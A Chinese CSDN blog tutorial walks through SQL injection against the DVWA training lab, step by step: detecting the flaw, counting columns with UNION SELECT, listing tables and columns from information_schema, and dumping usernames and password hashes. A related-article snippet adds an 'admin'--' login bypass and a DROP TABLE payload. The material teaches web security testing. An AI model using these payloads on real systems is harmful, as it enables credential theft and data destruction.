SQL注入思路分析(入门必看)

最新推荐文章于 2024-05-22 08:39:03 发布
最新推荐文章于 2024-05-22 08:39:03 发布
阅读量9.7k 收藏 53
点赞数 5
文章标签: 渗透测试 sql注入 数据库 MySQL 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35544379/article/details/77163831
版权

一、前言

最近正在学习SQL注入,纵观各种教程,有稍微讲解一下直接po步骤的,有对原理讲的很仔细的但步骤不明确的,因此便想做一个教程,将每一步写清楚,将思路理顺,让SQL注入入门不再困难,建议在阅读本文之前阅读本人的《SQL注入入门》系列文章,里面有一些原理性的讲解,对理解本文有帮助


因为主要做的是思路讲解,因此这里采用DVWA的low级别的SQL Injection来做演示,在尝试进行其他的SQL注入的过程中,并不会太顺利,一定会有一些让你停下来细细思考的点,不断寻找突破口,最终达到目的,享受在这个过程中的头脑风暴吧!

二、正文

Step1正常输入


Step2判断是否存在SQL注入漏洞

一般来说我们先进行单引号测试


服务器返回错误,显然并未对单引号作过滤的处理,判断存在SQL注入漏洞

Step3判断注入的类型

判断注入为数字型还是字符型,一般来说我们考虑这种分类方式

尝试数字型:输入2-1进行测试


显然,如果是数字型注入,这里显现的结果应该等同于ID=1的情况,据此判断不是数字型,保守起见,我们继续判断是否为字符型注入

(此处数据库为MySQL数据库)

尝试字符型:输入1' or'1'='2

如果是字符型,显然会输入ID=1的结果


结论:存在字符型注入

Step3猜解查询字段的个数

 

我们需要猜测在这里存在的查询语句的形式,以便我们的下一步操作

首先我们猜

1' union select 1;-- (这里最后有一个空格),也可以用1' union select 1;#


结果如上,因此继续尝试

1' unionselect 1,2;#


因此我们可以知道该查询语句中有两个字段

于是我们猜测的SELECT语句是这样的

SELECT First name,Surname

FROM

WHEREid='$_GET(xxxx)';

Step4尝试通过SQL注入查询出用户名与密码等敏感信息

1)获取当前数据库名

1' unionselect 1,database()#


因为前面我们知道,select语句有两个字段,因此需要填写两个,1database(),后者是我们想要的


可以发现,数据库名为dvwa

2)获取数据库表名

1'union select 1,table_name frominformation_schema.tables where table_schema=database()#


这里解释一下该语句的意思

table_name,table_shema都是MySQL"conditioninformation item name",简单而又不恰当的理解就是系统定义的变量,table_name表示表名,table_schema表示数据库名称


关于information_schema的用法可以看我的另一个文章,《MySQL数据库元数据简要说明

传送门:http://blog.csdn.net/qq_35544379/article/details/77161490



我们可以看到,数据库表名有guestbookusers两个

为了方便展示,我们可以采用sql提供给我们的字符串连接函数

GROUP_CONCAT()函数,它返回一个字符串结果,该结果由分组中的值连接组合而成。

在我另一个文章里也有详细说明http://blog.csdn.net/qq_35544379/article/details/77099115

例如上面我们可以写成


1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#


这样一来,我们想要的数据便在一行中展示出来了。

3)获取表中的列名

在上面,我们知道了该数据库中存在两个表guestbook,users

显然我们想要的用户名和密码应该会在users中,因此接下来我们想知道,在这个表中,存在哪些列?

我们可以这样


1' unionselect 1,group_concat(column_name) from information_schema.columns wheretable_name='users'#



结果我们发现了我们想要的梦寐以求的userpassword

 

4)获取password信息

好了,只差临门一脚了。

经过上面两次的训练,我们很简单可以写出下面的语句,由于可能结果很多,我们就不使用group_concat()这个函数了,转而使用concat(),两者的区别是前者返回一条字符串结果(n个结果结合一起的字符串),后者将每一条结果分开


1' unionselect 1,concat(user_id,',',user,',',password) from users#



成功获得我们想要的用户名和密码!!!!


Pz_mstr
关注
  • 5
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入详解
m0_67392811的博客
06-12 5697
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
关于sql注入这一篇就够了(适合入门
qq_53105813的博客
01-07 4869
sql注入详解
什么是SQL注入SQL注入详解(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
weixin_45840241的博客
05-22 3435
注意,在上面这个mapper文件中,只有一个select语句,而这个语句传参使用了符号$,它会把参数值直接进行替换,而不会进行预编译(如果使用占位符#,就会进行预编译,从而可以防止SQL注入)。(2) 加 ’and 1=1 此时sql 语句为:select * from table where name=’admin’ and 1=1’ ,也无法进行注入,还需要通过注释符号将其绕过;这显然是不对的,接口把查询范围之外的数据都搜索出来了,如果还有一些修改数据或者操纵数据库的一些命令,那就更危险了。
sql注入类型步骤详解(易懂)
m0_65080524的博客
07-26 626
介绍sql的原理,危害以及防御,并且附上详细的注入步骤以及常见过滤手段
SQL注入的详细过程
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-21 1293
SQL注入详细过程:SQL注入的详细过程第一步:SQL注入点探测。探测SQL注入点是关键的第一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞SQL注入的详细过程第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在
sql注入常见场景和解法
chen_yuxi的博客
08-10 336
sql注入
CTF从入门到提升(一).docx
12-18
Web网络攻防是CTF的主要题型,题目涉及到许多常见的Web漏洞,如XSS、文件包含、代码执行、上传漏洞SQL注入等。逆向工程主要包括了逆向工程中的常见题型、工具平台、解题思路。Pwn二进制漏洞利用主要考察二进制漏洞...
PHP代码审计入门指南1
08-04
- **SQL注入**:未经验证的用户输入可能操纵SQL查询,获取、修改或删除数据库中的数据。 - **XSS(跨站脚本攻击)**:用户输入的恶意脚本可能在其他用户浏览器中执行。 - ** SSRF(服务器端请求伪造)**:利用用户可...
Web安全从入门到放弃.pdf
01-02
2. **注入攻击 (Injection)**: 包括SQL注入、OS注入等,攻击者通过输入恶意代码来操控应用程序逻辑,获取敏感信息。 3. **破碎的认证 (Broken Authentication)**: 用户认证过程存在漏洞,如弱密码策略、会话管理...
常规的CTF题目解析.pdf
08-07
比如在在上传图片竟然含有SQL注入?http://127.0.0.1:12345/img.php?file=1.jpg中竟然不是文件包含漏洞?这不科学。 除了考验答题人的耐心以外,还要要求细心。高级题目简直就是变态的存在啊··· 当然其中除了一些...
asp.net知识库
06-18
最详细的SQL注入相关的命令整理 Oracle Oracle中PL/SQL单行函数和组函数详解 mssql+oracle Oracle编程的编码规范及命名规则 Oracle数据库字典介绍 0RACLE的字段类型 事务 CMT DEMO(容器管理事务演示) 事务隔离性的...
关于SQL注入的一些分析
whoim_i的博客
10-29 1万+
一、sql注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来实现对数据库的任意操作。 举例说明: id=id=id=_GET[‘id’] sql=SELECT∗FROMusersWHEREid=sql=SELECT * FROM users WHERE id=sq...
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
burpsuite靶场SQL注入总结
向阳-Y.的博客
03-28 6176
burpsuite靶场SQl注入笔记~
SQL注入思路详解
Litbai_zhang
03-10 782
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入 2.识别Web应用与数据库交互的可能输入点 GET请求参数 POST请求参数 Cookie X-Forword-For User-Agent Refer Host ...
sql注入详解-超详细零基础
居上
03-14 975
文章目录SQL注入寻找SQL注入点目标搜集无特定目标有特定目标工具爬取注入识别手工简单识别工具识别高级识别代码审计SQL注入流程流程导图信息搜集数据获取手工查询提示提权SQL注入分类UNION联合查询注入UNION注入应用场景UNION注入过程报错注入应用场景方法盲注布尔盲注原理布尔盲注的方法时间盲注原理时间盲注的方法Dnslog盲注原理Dnslog盲注方法宽字节注入防御原理方法注入手工sqlmap二次编码注入原理注入手工sqlmap二次注入原理防御 SQL注入 寻找SQL注入点 目标搜集 无特定目标 i
SQL注入
hungryfoolisher的博客
07-03 343
1.工具:sqlmap,结合burpsuite和msf 2.注入原理:鹰书 3.攻击方法: 3.1.参考 3.2.乌云知识库,搜索sql注入
漏洞扫描】——12、AppScan安装使用
Fly_鹏程万里
03-01 947
前言不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。一、什么是SQLSQL(Struct Query Language)结构化查询语言,是一种面向数据库的编程语言,它可以对数据库中的信息进行增删改查操作。SQL可以与多种数据库程序协同工作,比如MS Acces...
使用 Burpsuite 进行POST 方式的SQL注入
枫梓林のBlog
04-25 7819
使用 Burpsuite 进行POST 方式的SQL注入 文章目录使用 Burpsuite 进行POST 方式的SQL注入0x01 Burpsuite介绍1.打开浏览器设置代理2.打开 burp suite0x02 POST 方式注入1.打开 Less-11页面0x03 POST 方式的盲注1.POST 方式的布尔型盲注1.1 Less-152.POST 方式的时间盲注0x04 HTTP 头的注入方式1.HTTP 头注入原理2. HTTP User-Agent 注入Less-183.HTTP Referer
sql注入报文分析
05-25
SQL注入攻击是指攻击者通过向应用程序的输入参数中注入恶意的SQL代码,从而使应用程序执行非预期的SQL查询或命令。攻击者可通过这种方式获取敏感信息、篡改数据甚至控制整个数据库系统。下面是一个简单的SQL注入攻击报文分析: 假设一个应用程序提供了用户登录功能,用户在登录时需要输入用户名和密码。该应用程序使用以下SQL语句验证用户是否存在: ``` SELECT * FROM users WHERE username = '$username' AND password = '$password' ``` 其中 $username 和 $password 是用户输入的变量,应用程序会将这些变量拼接到SQL语句中。攻击者可以利用这个漏洞进行SQL注入攻击,例如,攻击者可能输入以下内容: ``` Username: admin'-- Password: 123456 ``` 攻击者在用户名输入框中输入了 "admin'--",这会导致SQL查询变成以下形式: ``` SELECT * FROM users WHERE username = 'admin'--' AND password = '123456' ``` 在SQL语句中,"--" 表示注释,它后面的所有内容都将被忽略。因此,攻击者成功绕过了密码验证,登录到了系统中。通过这种方式,攻击者可以执行任意的SQL命令,例如: ``` Username: admin'; DROP TABLE users;-- Password: 123456 ``` 在这种情况下,攻击者在用户名输入框中输入了 "admin'; DROP TABLE users;--",这会导致SQL查询变成以下形式: ``` SELECT * FROM users WHERE username = 'admin'; DROP TABLE users;--' AND password = '123456' ``` 这个查询会执行两个命令:首先,它会查询用户名和密码是否匹配;其次,它会删除 users 表。攻击者成功地删除了 users 表,破坏了整个数据库系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值